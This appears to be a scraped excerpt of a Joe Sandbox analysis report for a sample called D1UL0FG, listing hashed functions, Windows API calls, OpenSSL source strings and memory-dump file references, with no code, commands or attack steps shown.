• Opcode ID: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
• Instruction ID: 371de4d3051e5fa0828b243f2b3739cad3ef787a7fcc830c3c5c8f456271bebf
• Opcode Fuzzy Hash: 113c6b1de756f4b5b5eb6aeb9c43a8ac160651dc44d73755d1f433b83002bd4c
• Instruction Fuzzy Hash: 7F417233A38A8691EA11FB24E4542E96321FFD4384FA00572EA5DC36E5EF3CE545D740

Control-flow Graph
(control-flow graph edge list omitted; function at 7ff8b9109f18-7ff8b910a151, referencing 00007FF8A8C4BB78; API calls: CertEnumCertificatesInStore, CertCloseStore, CertFreeCertificateContext, GetLastError; internal calls to 7ff8b910be54, 7ff8b910d888, 7ff8b910db80, 7ff8b910d9a8, 7ff8b910a828, 7ff8b910b750, 7ff8b910dc68, 7ff8b910db50, 7ff8b910db08)
APIs
Memory Dump Source
• Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
• Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
Similarity
• API ID: Cert$Store$ErrorLast$00007CertificateCertificatesCloseContextEnhancedEnumFreeOpenUsage
• String ID:
• API String ID: 1905439668-0
• Opcode ID: e8ffdbe4bdc1dbe6677b56bf781ee610824ebcc7787cfae9ac3e7d3063b7a65d
• Instruction ID: 849c4702b1247777a6cfe0b6185ba65b8c063e7b314ba566db6551d43f7a5388
• Opcode Fuzzy Hash: e8ffdbe4bdc1dbe6677b56bf781ee610824ebcc7787cfae9ac3e7d3063b7a65d
• Instruction Fuzzy Hash: 41514D25E0AB8681FA599F29A91913933E4FF45BD0F4984B0CF0E467B8DE3FE455A310

Control-flow Graph
(control-flow graph edge list omitted; function at 7ff8b910be54-7ff8b910bf20; API calls: CertOpenStore (two call sites), CertAddStoreToCollection, CertCloseStore)
APIs
Memory Dump Source
• Source File: 00000006.00000002.3010460517.00007FF8B9101000.00000040.00000001.01000000.00000015.sdmp, Offset: 00007FF8B9100000, based on PE: true
• Associated: 00000006.00000002.3010325096.00007FF8B9100000.00000002.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010460517.00007FF8B911E000.00000040.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010460517.00007FF8B9128000.00000040.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010843875.00007FF8B912B000.00000080.00000001.01000000.00000015.sdmp
• Associated: 00000006.00000002.3010910842.00007FF8B912D000.00000004.00000001.01000000.00000015.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8b9100000_D1UL0FG.jbxd
Similarity
• API ID: CertStore$CloseOpen$Collection
• String ID:
• API String ID: 1995843185-0
• Opcode ID: e967edb42384cb88553adc9f0faa7ad78790174b17245df176d4b61c22f82093
• Instruction ID: d7f9763a647e872915aa8e908bf5a6170eb6aae75ab497cbf08cd2bb1e0300a6
• Opcode Fuzzy Hash: e967edb42384cb88553adc9f0faa7ad78790174b17245df176d4b61c22f82093
• Instruction Fuzzy Hash: 18215E36B18B9186EB64CF2AA944729A7A2FB84BC0F088070DF4D43B64DF3DE455D600
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CloseCreateFileHandle_invalid_parameter_noinfo
• String ID:
• API String ID: 1279662727-0
• Opcode ID: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction ID: c39134dfe076cbc8157a1f1181bde4c76f954160a48a2d72db510079ec3406e1
• Opcode Fuzzy Hash: bf36874ab91a00f02a28b4fbd79205fddfb0159c1c162080bddd18248f81d06a
• Instruction Fuzzy Hash: E5419223E2C78283F750AB6096503796360FB947A4F109375EA9C43AE2DF7CA5F09750
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: __scrt_acquire_startup_lock__scrt_dllmain_crt_thread_attach__scrt_get_show_window_mode__scrt_release_startup_lock
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3251591375-0
                                                                                                                                                                                                                                          • Opcode ID: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction ID: 9a5ff3a8e457948339756e4c2415db1943d1f08dd9aa8c00c0906f17388ef3bd
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: bd18f10481fc1cc14ce46c2a249e6ab71ba61d2437927de899b0ff225cfe2228
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0A316D23E2D14345FA64BB74D8613B917919FC5388F6444B8E94ECB2F3DE2CA885E280
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\statem\statem.c
                                                                                                                                                                                                                                          • API String ID: 1452528299-2512360314
                                                                                                                                                                                                                                          • Opcode ID: 7d5c6cafbdf9eba0533a02d895b16706df5be332ea577afecea6ad0cef54847e
                                                                                                                                                                                                                                          • Instruction ID: 21ce4d3e96ce042f21fcd605ca46810f8e3b02968a927ac67a363e3f930c7b3d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 7d5c6cafbdf9eba0533a02d895b16706df5be332ea577afecea6ad0cef54847e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 17B14E72A0EAC6A6EB649F16D44437927F0FF60B8CF145436DA0986699DF3DE884C701
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID: ..\s\ssl\record\rec_layer_s3.c
                                                                                                                                                                                                                                          • API String ID: 1452528299-2209325370
                                                                                                                                                                                                                                          • Opcode ID: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                                                                                                                                                                                                          • Instruction ID: 142898c7a872be6ec199d8c3cd1915cc96601bb368e44e3a36510a70c61eb8d1
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3dcb4004876841d817ef47d2efc369b4e2620c560bc807afff1c78d3bfb42160
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 21816D32A0EAC191FB509E29D5843B96BE0FB44FD8F184135DE5C8BA99EF38D446C340
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 3215553584-0
                                                                                                                                                                                                                                          • Opcode ID: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction ID: 06daeb1e8a4e174833dba9043aad17d5c891e2897e43f9227b117fac3d77211b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 2fd4b9cf4e2c203a215f80a0453bc9b94d2a0e119ef729a2f51343e3c0f92604
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9E512763B6D24286F768BA69940067A63D1BF44BA4F144774DD6CC77E6CF3CE501A600
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorFileLastPointer
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2976181284-0
                                                                                                                                                                                                                                          • Opcode ID: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction ID: 17fbc5e42ef2ef668aba8c102dc3d77ba500191a4eb61843f959d7192d02d942
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: fe8bab274ce7bcf2293d1df97f88808174c3604892bb54168c1d2d59b6616a84
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6E11016372CA8181EA10AB25B8000696361FB85BF4F544371EEBD8B7F8CF3CD0418740
APIs
• RtlFreeHeap.NTDLL(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9CE
• GetLastError.KERNEL32(?,?,?,00007FF67AEF2D92,?,?,?,00007FF67AEF2DCF,?,?,00000000,00007FF67AEF3295,?,?,?,00007FF67AEF31C7), ref: 00007FF67AEEA9D8
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: ErrorFreeHeapLast
• String ID:
• API String ID: 485612231-0
• Opcode ID: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
• Instruction ID: 85646e51a839b81afbd78bedd12939bfff1ff64ce7cfa50efb23786e544f88fe
• Opcode Fuzzy Hash: 4768bb9444967098c6ff0662bce39d003f3d6bed11959a3c87c06bce48e858a7
• Instruction Fuzzy Hash: 87E08C53F3D24282FF487BF2B8551381391AF88B41F0480B8C81DC72B2EE2DA885A700
APIs
• CloseHandle.KERNEL32(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC36
• GetLastError.KERNEL32(?,?,?,00007FF67AEEAA45,?,?,00000000,00007FF67AEEAAFA), ref: 00007FF67AEEAC40
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: CloseErrorHandleLast
• String ID:
• API String ID: 918212764-0
• Opcode ID: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
• Instruction ID: 62ec347c2cdc8720c7d5a1dc495eaf9659d4a608cb08c976f3b13fa9f078f71d
• Opcode Fuzzy Hash: 1c4273fb4a414bd16749861b25ace672462e960675883ae7dbf138385109c950
• Instruction Fuzzy Hash: 60217513F3C68242FE947761A49427D17929F84BA1F4842BDDA2EC77F5CE6CE445A300
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
• Opcode ID: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Instruction ID: b194837250b3535b1dad5bfe3d63449e99ff124642fe13a609af642c13a671e1
• Opcode Fuzzy Hash: 83fd655adac635c1bfef66338e564e5d3c087748e58eff1a34e14c1f5e77bb28
• Instruction Fuzzy Hash: 36410333A2C20187FA34AB19E45027977A0EB55B91F104275DACEC76E1CF2DF442EB91
APIs
Memory Dump Source
• Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
• Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmp
• Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
• Opcode ID: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
• Instruction ID: ef4177ecb0ffc5e55d2b5cb3a6f714646b239cbdb0d3a0501d09274998c4b5eb
• Opcode Fuzzy Hash: 8461a2502f026d7e122df3db3e91d2553ea804ff5e6dd715b8e622b6a9c6ea1c
• Instruction Fuzzy Hash: 2831A572A0EAC6A6FB649F16954023D73B1EF70BC8F545432DE0D87689DE38E8828741
APIs
Memory Dump Source
• Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
• Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmp
• Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _fread_nolock
• String ID:
• API String ID: 840049012-0
• Opcode ID: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
• Instruction ID: 4b10d89de6633b26b97da5fb080bcc8084afead2998eb4522735428833d85c4d
• Opcode Fuzzy Hash: a7520e828596113b268e63b2d981a6b665d81183b45f3f30672e017b73aefd71
• Instruction Fuzzy Hash: 1D212923B2C65145FA10BB2265147BAA751BF85FC4F9C5070EE0C8B796CE7DE041E700
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
Similarity
• API ID: _invalid_parameter_noinfo
• String ID:
• API String ID: 3215553584-0
APIs
  • Part of subcall function 00007FF67AED9400: MultiByteToWideChar.KERNEL32(?,?,?,00007FF67AED45E4,00000000,00007FF67AED1985), ref: 00007FF67AED9439
• LoadLibraryExW.KERNEL32(?,00007FF67AED6466,?,00007FF67AED336E), ref: 00007FF67AED9092
Similarity
• API ID: ByteCharLibraryLoadMultiWide
• String ID:
• API String ID: 2592636585-0
APIs
Similarity
• API ID: ErrorLast
• String ID:
• API String ID: 1452528299-0
APIs
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff8a92e0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: ErrorLast
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 1452528299-0
                                                                                                                                                                                                                                          • Opcode ID: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                                                                                                                                                                                                          • Instruction ID: fd594038d59d686154875ddcb7e023d0b848bf758bcb6720803879813d57cd51
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: f8a161ca16946112414120da3da362b423baedddf845a4f9c426056871324c08
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 99217A32A0878096E754CF26E5806ADB7A4FB88BD0F148135EB9C83B69CF7CD165CB00
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • HeapAlloc.KERNEL32(?,?,00000000,00007FF67AEEB39A,?,?,?,00007FF67AEE4F81,?,?,?,?,00007FF67AEEA4FA), ref: 00007FF67AEEEC5D
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3001876429.00007FF67AED1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF67AED0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001832554.00007FF67AED0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3001937684.00007FF67AEFB000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF0E000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002021566.00007FF67AF11000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3002115379.00007FF67AF14000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_6_2_7ff67aed0000_D1UL0FG.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: AllocHeap
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 4292702814-0
                                                                                                                                                                                                                                          • Opcode ID: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                          • Instruction ID: 4f2edcf9cc4e26ee22f3682bb768c12c1c08652d4aed9a35be88a98b7cce543d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 359dceec71bad03d682dc04f56d48d79ef81111e86adbc932549883800f831e6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8FF09052B2D787E0FE987B62A8513B563809F88F80F4C55B0CD0EC63F1EE1CE480A210
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000006.00000002.3007572245.00007FF8A92E1000.00000040.00000001.01000000.00000017.sdmp, Offset: 00007FF8A92E0000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007520980.00007FF8A92E0000.00000002.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9354000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9356000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9379000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A9384000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007572245.00007FF8A938E000.00000040.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007939655.00007FF8A9391000.00000080.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000006.00000002.3007986367.00007FF8A9393000.00000004.00000001.01000000.00000017.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
